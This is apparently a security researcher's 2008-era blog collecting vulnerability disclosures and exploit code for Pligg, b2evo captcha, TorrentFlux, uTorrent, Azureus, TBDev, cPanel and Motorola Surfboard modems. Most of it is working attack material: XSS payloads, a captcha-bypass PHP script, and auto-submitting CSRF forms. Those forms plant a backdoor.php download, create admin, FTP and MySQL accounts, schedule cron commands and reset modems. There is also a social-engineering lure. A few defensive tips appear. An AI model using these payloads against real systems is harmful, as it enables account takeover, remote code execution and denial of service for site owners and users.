Thanks everyone for showing up to my two Defcon 16 talks. As a gift to defcon I made avaible some hard to find code:
http://rooksecurity.com/goodiebag.zip
Best Wishes,
Michael
Software Affected:Pligg 9.9.5
Download: http://forums.pligg.com/current-version/14301-pligg-beta-9-9-5-a.html
Exploit Code:http://rooksecurity.com/exploits/pligg_auto_voter.txt
Simple XSS PoC:
http://some_pligg/index.php?category=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Explication:
Pligg Suffers from a Reflective Cross Site Scripting vulnerability in index.php. For the $_GET['category'] variable. Exploit code was written that uses this flaw to bypass the CSRF protection to then vote on any pligg article of the attackers choosing.
This xss vulnerablity is made more serious when combined with my Captcha Implementation Bypass http://www.rooksecurity.com/blog/?p=17 which allows an attacker to create new user accounts. With a new user account one can automatically add new pligg links. The link could go to a page with the malicious iframe forcing the user to vote on an article of the attacker choosing. I took inspiration from the Myspace Sammy worm utilizing XMLHttpRequest() to read the randomly generated token protection requests from forgery. The exploit has been tested on FireFox 3 and IE7.
Software Affected:Pligg 9.9.5
Download: http://forums.pligg.com/current-version/14301-pligg-beta-9-9-5-a.html
Explication:
The latest version of suffers from a captcha bypass due to an implementation issue. The impact is that an attacker can automatically create user accounts for pligg. The creation of new user accounts makes this auto-voter exploit more serious: http://www.rooksecurity.com/blog/?p=19
The catpcha’s answer is generated the same as php-nuke 8.1. This was broken here:
http://www.securityfocus.com/bid/27129/info .
This is a more serious attack when combined with my Captcha bypass which allows an attacker to create new user accounts.
Again the captcha is produced using md5, however this is different. The $_SERVER['HTTP_USER_AGENT'] and $ts_random can be controlled by the attacker. $sitekey is a static value, and $datekey is known because it is based on time.
Exploit:
The link to the capthca image will look something like this:
http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854
To obtain the clear text, send that ts_random value to the captcha_bypass.php with the same web browser:
http://127.0.0.1/captcha_bypass.php?ts_random=54771854
captcha_bypass.php:
<?php
$sitekey=82397834;
$ts_random=$_REQUEST['ts_random'];
$datekey = date(”F j”);
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
print substr($rcode, 2, 6);
?>
Affected Software: b2evo-captcha, bigace 2.4, Online Ballot 1.0
Download:
http://voxel.dl.sourceforge.net/sourceforge/b2evo-captcha/b2evo-captcha-1.3.1.tar.gz
http://downloads.sourceforge.net/bigace/bigace_2.4.zip
http://downloads.sourceforge.net/onlineballot/online_ballot_1.0.zip
Explanation:
B2evo Captcha can be bypassed due to a implementation issue. The answer to this Captcha is stored in a md5 hash much like a password. The md5 hash is used to identify the .jpeg file its self so it is trivial to obtain. The md5 hash is unsalted and can easily be broken using RainbowCrack or John The Ripper.
The answer for the Captcha is generated by choosing 6 random characters from this list:
23456789?@#$%&*ABCDEFGHJKLMNPQRSTUVWXYZ
Example:
http://127.0.0.1/b2evo_captcha/b2evo_captcha_tmp/b2evo_captcha_8988d4408dc2db8880bab4ab7ee23780.jpg
8988d4408dc2db8880bab4ab7ee23780=md5(”$*L4Z6″);
I found a Memory Corruption flaw in PHP. I did the responsible thing and reported it to the newly created oCERT. I am very excited about this newly created response team.
Check back and more information will be provided about this vulnerability. I am waiting until a patch is available.
Today is my birthday and I am now 22 years old. Two years ago today I obtained remote code execution by exploiting a flaw I found. It was this exploit: Ultimate PHP Board
I made a number of flaws public today in celebration. My exploits have gotten more advanced in the past two years. But even two years ago I used exploit chaining. However today I’m building even more advanced chains such as my CSRF Bounce attack against TBDev. My math has also gotten a lot better; I went from a breaking a weak block cypher with algebra to breaking a hardened Capthca with Discrete math and fuzzy logic. In the past two years I have released a number of great exploits you should check them out here:Milw0rm Exploits
Even two years ago I did not hide behind an Alias. My name is Michael Brooks, I find flaws in software and I write exploit code.
Peace Out
It is becoming increasing more common to have a web application interface for software that would normally be confined to the desktop. BitTorrent Clients are a great example of this. A great attack for BitTorrent Clients would be a BitTorrent server, such as my TBDev Bounce Attack.
It turns out all of the major web interfaces are vulnerable. The biggest problem with exploitation is that its diffcult for the attacker to know the exact location of the Web Interface. Even though remote code execution is possible this is not a very serious vulnerability because it is diffcult to exploit.
TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/
<html>
<br>
If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php">
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent">
<input type=submit value='file attack'>
</from>
<html>
<script>
document.getElementById('file_attack').submit();
</script>
<html>
Add an admistrative account:
<form id=’create_admin’ method=”post” action=”http://localhost/torrentflux_2.3/html/admin.php?op=addUser”>
<input type=hidden name=”newUser” value=”sadmin”>
<input type=hidden name=”pass1″ value=”password”>
<input type=hidden name=”pass2″ value=”password”>
<input type=hidden name=”userType” value=1>
<input type=submit value=’create admin’>
</form>
</html>
<script>
document.getElementById(’create_admin’).submit();
</script>
uTorrent’s WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azurues’s HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
This is describing a real attack against:
TBDev
Exploit code
CSRF (http://www.owasp.org/index.php/Cross-Site_Request_Forgery) is often referred to as a Sleeping Giant. I think the giant is awake, but I’ll let the reader decide by looking at my latest attacks. This attacks uses CSRF in a chain with other flaws to obtain synergy, I call this CSRF Bouncing.
Security is difficult, and for many its an impossible battle keep there system from getting broken into. Some web application developers will choose there battles by trusting the administrative interface. If the administrator has access to tools like phpmyadmin, then why secure the administrative interface from SQL Injection? In the case of my TBDev Exploit the developers did not harden the administrative interface from Cross Site Scripting attacks (http://www.owasp.org/index.php/Cross_Site_Scripting). Unfortunately this Cross Site Scripting attack is accessible by an attacker using a Cross Site Request Forgery. The Cross Site Scripting flaw is particularly valuable. The XSS payload is stored in the main index.php for the application. This means that an attacker can expose every visitor to their payload.
What makes it worse is that the application uses immortal session tokens. In fact the Session ID is a salted MD5 hash of the persons password. This is an insecure cryptographic implementation. Make no mistake, salting your passwords does not make your system immune to a large rainbow table. After the password is cracked the clear text salt can be identified. However the attacker does not have to break the password hash to authenticate with the application. This is a serious vulnerability in its self, and made even more serious by the persistent XSS flaw. It is shocking to me that people still use broken message digest functions to store their passwords. I’m not sure why a developers think its okay to introduce a nearly four year old vulnerability into their system. The SHA-2 family has withstood cryptanalysis, and it should be used to secure passwords.
The CSRF flaw is POST based so it does require the administrator to execute javascript. Finding the administrator isn’t difficult if you have a user account on the system. Like with just about every SQL Powered application the administrator is the first user account created, so the primary key will be 1. This URL will be the admin’s profile on nearly every install of TBDev: http://localhost/userdetails.php?id=1
From this profile you will be able to send a personal message and you may even be able to obtain the admin’s email address.
If you don’t have a user account you can use this reflective xss flaw to obtain one:
http://localhost/redir.php?url=XSS
By using social engineering the hacker has a greater chance of the attack succeeding. In this case I am using the reflective XSS flaw to make it appear as though the administrator is viewing his own web application. The social engineering attack could look something like this:
“I think there is a bug in your site. Can you check this link, it just does not look right http://localhost/redir.php?url=’ . This now means the flaw is no longer a “Cross Site” Request Forgery, because the request is being sent from the same website.
By having XSS on the front page its possible to further attack the client. There is the usual mpack or xss shell attacks. However I wrote CSRF attacks against three different BitTorrent clients.
After the attack has completed the website can be defaced or every user’s authentication token can be hijacked indefinitely. To remove the persistent XSS the administrator might have to login to the SQL server manually and delete the offending entry in the “news” table. The difficult part is that every user will have to change their password. In PHP I suggest defending against XSS using htmlspecialchars($var,ENT_QUOTES); . There are cases where XSS can still be possible without ENT_QUOTES. To defend against CSRF i suggest using http://www.owasp.org/index.php/PHP_CSRF_Guard .
Cpanal has no protection against CSRF what so ever. I picked out attacks that I thought where the most serious. This is some of the most damaging CSRF Possible.
create database:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name
create new mysql user:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin
add ftp user:
<html>
<form id=1 method=’post’ action=’http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>
or just cut to the chase and get a shell. This will run a command every hour of every day.
<html>
<form id=2 method=’post’ action=’http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>
Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery.
The latest version of The Motorola Surfboard is affected at the time of the writing.
Software Version: SB5100-2.3.3.0-SCM00-NOSH
Hardware Version: 3
MIB Version: II
GUI Version: 1.0
VxWorks Version: 5.4
Restarts the modem:
<html>
<form id=1 method=post action=’http://192.168.100.1/configdata.html’>
<input name=’BUTTON_INPUT’ value=’Restart+Cable+Modem’>
</form>
<html>
<script>
document.getElementById(1).submit();
</script>
This CSRF will disconnect the user from the internet for longer.
“The process to get back online from a factory default condition could take from 5 to 30 minutes.”
<html>
<form id=2 method=post action=’http://192.168.100.1/configdata.html’>
<input name=’BUTTON_INPUT’ value=’Reset+All+Defaults’>
</form>
<html>
<script>
document.getElementById(2).submit();
</script>